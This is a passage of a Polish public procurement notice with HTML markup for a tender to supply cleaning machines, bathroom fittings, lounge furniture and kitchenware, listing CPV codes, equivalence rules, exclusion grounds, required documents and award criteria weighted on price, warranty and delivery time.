wymaga co najmniej 36 miesięcznej gwarancji jakości na dostarczone przedmioty, zamontowa-ne urządzenia i użyte materiały od dnia odebrania przez Zamawiającego i podpisania (bez uwag) protoko-łu końcowego.3.6.	Nomenklatura Wspólnego Słownika Zamówień Publicznych (CPV).CZĘŚĆ I- wyposażenie do utrzymania czystości42995000-7 różne maszyny czyszcząceCZĘŚĆ II - wyposażenie łazienek44410000-7 artykuły łazienkowe39299300-7 lustra szklane39224340-3 kosze42968300-2 system do podawania papieru toaletowegoCZĘŚĆ III-	wyposażenie strefy relaksu39113000-7 różne siedziska i krzesła31520000-7 lampy i oprawy oświetleniowe39531000-3 dywanyCZĘŚĆ IV-	wyposażenie kuchni39221180-2 naczynia do gotowania39221000-7 sprzęt kuchenny39221100-8 zastawa kuchenna39241100-4 noże39223000-1 łyżki, widelce39221150-3 termosy3.7.	Rozwiązania równoważne.3.7.1.	W przypadku użycia w SIWZ lub załącznikach odniesień do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 30 ust. 1 pkt. 2 i ust. 3 ustawy pzp Zamawiający dopuszcza rozwiązania równoważne do opisywanych. Wykonawca analizując opis przedmiotu zmówienia powinien założyć, że każdemu odniesieniu, o którym mowa w art. 30 ust. 1 pkt. 2 i ust. 3 ustawy pzp, użytemu w opisie przedmiotu zamówienia towarzyszy wyraz ,,lub równoważne".3.7.2.	W przypadku, gdy w SIWZ lub załącznikach zostały użyte znaki towarowe, oznacza to, że są podane przy-kładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard. Wyko-nawca może zastosować materiały lub urządzenia równoważne, lecz o parametrach technicznych i jakościo-wych podobnych lub lepszych, których zastosowanie w żaden sposób nie wpłynie negatywnie na prawidło-we funkcjonowanie rozwiązań przyjętych w dokumentacji projektowej. Wykonawca, który zastosuje urzą-dzenia lub materiały równoważne będzie obowiązany wykazać w trakcie realizacji zamówienia, że zastoso-wane przez niego urządzenia i materiały spełniają wymagania określone przez Zamawiającego.3.7.3.	Użycie w SIWZ lub załącznikach oznakowania w rozumieniu art. 2 pkt. 16 ustawy pzp oznacza, że Zamawia-jący akceptuje także wszystkie inne oznakowania potwierdzające, że dane roboty budowlane, dostawy lub usługi spełniają równoważne wymagania. W przypadku, gdy Wykonawca z przyczyn od niego niezależnych nie może uzyskać określonego przez Zamawiającego oznakowania lub oznakowania potwierdzającego, że dane dostawy lub usługi spełniają równoważne wymagania, Zamawiający w terminie przez siebie wyzna-czonym akceptuje inne odpowiednie środki dowodowe, w szczególności dokumentację techniczną producen-ta, o ile dany Wykonawca udowodni, że dostawy lub usługi, które mają zostać przez niego wykonane, speł-niają wymagania określonego oznakowania lub określone wymagania wskazane przez Zamawiającego.3.7.4.	Użycie w SIWZ lub załącznikach wymogu posiadania certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę jednostkę jako środka dowodowego po-twierdzającego zgodność z wymaganiami lub cechami określonymi w opisie przedmiotu zamówienia, kry-teriach oceny ofert lub warunkach realizacji zamówienia oznacza, że Zamawiający akceptuje również certyfi-katy wydane przez inne równoważne jednostki oceniające zgodność. Zamawiający akceptuje także inne od-powiednie środki dowodowe, w szczególności dokumentację techniczną producenta, w przypadku gdy dany Wykonawca nie ma ani dostępu do certyfikatów lub sprawozdań z badań, ani możliwości ich uzyskania w odpowiednim terminie, o ile ten brak dostępu nie może być przypisany danemu Wykonawcy, oraz pod wa-runkiem że dany Wykonawca udowodni, że Wykonywane przez niego dostawy lub usługi spełniają wymogi lub kryteria określone w opisie przedmiotu zamówienia, kryteriach oceny ofert lub warunkach realizacji zamówienia.3.8.	Stosownie do treści art. 29 ust. 3a ustawy prawo zamówień publicznych z uwagi na specyfikę zamówienia, Zamawia-jący nie określa w opisie przedmiotu zamówienia żadnych wymagań dotyczących zatrudnienia przez Wykonawcę lub Podwykonawcę, na podstawie umowy o pracę, osób wykonujących wskazanych przez Zamawiającego czynności w zakresie realizacji zamówienia w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 roku - Kodeks pracy (Dz. U. z 2014 r. poz. 1502, z późniejszymi zmianami).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">42995000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44410000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39299300-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39224340-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42968300-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39113000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>31520000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39531000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221180-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39241100-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39223000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39221150-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">14</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">5.1.	Wykonawca jest zobowiązany wykonywać zamówienie w terminie maksymalnie do 14 dni od podpisania umowy.5.2.	Zamawiający wymaga, aby Wykonawca przystąpił do wykonania Zamówienia niezwłocznie po zawarciu umowy. 5.3.	Skrócenie terminu wykonania zamówienia będzie stanowiło jedno z kryteriów oceny ofert.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie szczegółowych wymagań.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wskazania braku podstaw do wykluczenia w opar-ciu o art. 24 ust. 5 pkt. 1 ustawy [dotyczy Wykonawcy, w stosunku do którego otwarto likwidację, w zatwierdzonym przez sąd układzie w postę-powaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 roku - Prawo restrukturyzacyjne (Dz. U. z 2015 roku poz. 978, 1259, 1513, 1830 i 1844 oraz z 2016 roku poz. 615) lub którego upadłość ogłoszono, z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawo-mocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 roku - Prawo upadłościowe (Dz. U. z 2015 roku poz. 233, 978, 1166, 1259 i 1844 oraz z 2016 roku poz. 615)], W przypadku Wykonawców wspólnie ubiegających się o udzielenie za-mówienia dokumenty, do złożenia których wezwie Za-mawiający w celu wykazania braku podstaw do wykluczenia (wskazane w pkt. 7.5.) powinny potwierdzać spełnienie tych wa-runków przez każdego Wykonawcę oddzielnie. Jeżeli Wykonawca w celu wykazania speł-niania warunków udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekono-micznej innych podmiotów na zasadach określonych w art. 22a ustawy pzp, zo-bowiązany jest złożyć w odniesieniu do tych podmiotów ww. dokument</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Ponadto Wykonawca powinien złożyć -wypełniony i pod-pisany formularz oferty - ; ew. pełnomoc-nictwo - ew. Zobowiązanie innego podmiotu ( na zasobach którego polega wykonawca) do oddania do dys-pozycji wykonawcy niezbęd-nych zasobów na potrzeby realizacji za-mówienia ponadto w terminie 3 dni od dnia upublicz-nienia przez zamawiającego na stronie internetowej informacji z otwarcia ofert o których mowa w art. 86 ust 5 ustawy pzp, , każdy wykonawca, w celu wykaza-nia braku pod-staw do wykluczenia z postępowania o udzielenie zamó-wienia publicznego przekazuje zamawiającemu oświadcze-nie, o przynależności albo braku przynależności do tej samej grupy kapitałowej o której mowa w art. 24 ust. 1 pkt 23 ustawy pzp. W przypadku przynależ-ności do tej samej grupy kapitałowej, wraz ze złoże-niem oświadcze-nia, wykonawca powinien przestawić, pod rygorem wykluczenia z postępowania o udzielenie zamówienia, dowo-dy, że powiązania z innym wykonawcą nie prowadza do zakłócenia konkurencji w postę-powaniu o udzielenie zamó-wienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres udzielonych gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin wykonania dostaw</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span 